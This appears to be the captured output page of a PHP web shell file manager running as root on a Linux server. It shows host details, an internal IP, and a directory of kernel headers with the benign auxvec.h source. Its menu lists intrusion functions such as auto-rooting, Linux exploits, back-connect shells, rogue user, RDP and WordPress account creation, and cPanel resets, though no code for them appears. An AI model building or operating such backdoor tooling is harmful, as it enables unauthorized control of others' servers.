Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
linux /
uapi /
sh /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
auxvec.h
1.02
KB
-rw-r--r--
bitsperlong.h
37
B
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
278
B
-rw-r--r--
cachectl.h
648
B
-rw-r--r--
cpu-features.h
1.13
KB
-rw-r--r--
errno.h
31
B
-rw-r--r--
fcntl.h
31
B
-rw-r--r--
hw_breakpoint.h
167
B
-rw-r--r--
ioctl.h
31
B
-rw-r--r--
ioctls.h
4.92
KB
-rw-r--r--
ipcbuf.h
32
B
-rw-r--r--
mman.h
30
B
-rw-r--r--
msgbuf.h
32
B
-rw-r--r--
param.h
31
B
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
95
B
-rw-r--r--
posix_types_32.h
801
B
-rw-r--r--
ptrace.h
856
B
-rw-r--r--
ptrace_32.h
1.57
KB
-rw-r--r--
resource.h
34
B
-rw-r--r--
sembuf.h
32
B
-rw-r--r--
setup.h
31
B
-rw-r--r--
shmbuf.h
32
B
-rw-r--r--
sigcontext.h
550
B
-rw-r--r--
siginfo.h
33
B
-rw-r--r--
signal.h
343
B
-rw-r--r--
socket.h
32
B
-rw-r--r--
sockios.h
602
B
-rw-r--r--
stat.h
1.64
KB
-rw-r--r--
statfs.h
32
B
-rw-r--r--
swab.h
880
B
-rw-r--r--
termbits.h
34
B
-rw-r--r--
termios.h
33
B
-rw-r--r--
types.h
31
B
-rw-r--r--
ucontext.h
34
B
-rw-r--r--
unistd.h
90
B
-rw-r--r--
unistd_32.h
11.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auxvec.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef __ASM_SH_AUXVEC_H #define __ASM_SH_AUXVEC_H /* * Architecture-neutral AT_ values in 0-17, leave some room * for more of them. */ /* * This entry gives some information about the FPU initialization * performed by the kernel. */ #define AT_FPUCW 18 /* Used FPU control word. */ /* * Only define this in the vsyscall case, the entry point to * the vsyscall page gets placed here. The kernel will attempt * to build a gate VMA we don't care about otherwise.. */ #define AT_SYSINFO_EHDR 33 /* * More complete cache descriptions than AT_[DIU]CACHEBSIZE. If the * value is -1, then the cache doesn't exist. Otherwise: * * bit 0-3: Cache set-associativity; 0 means fully associative. * bit 4-7: Log2 of cacheline size. * bit 8-31: Size of the entire cache >> 8. */ #define AT_L1I_CACHESHAPE 34 #define AT_L1D_CACHESHAPE 35 #define AT_L2_CACHESHAPE 36 #define AT_VECTOR_SIZE_ARCH 5 /* entries in ARCH_DLINFO */ #endif /* __ASM_SH_AUXVEC_H */
Close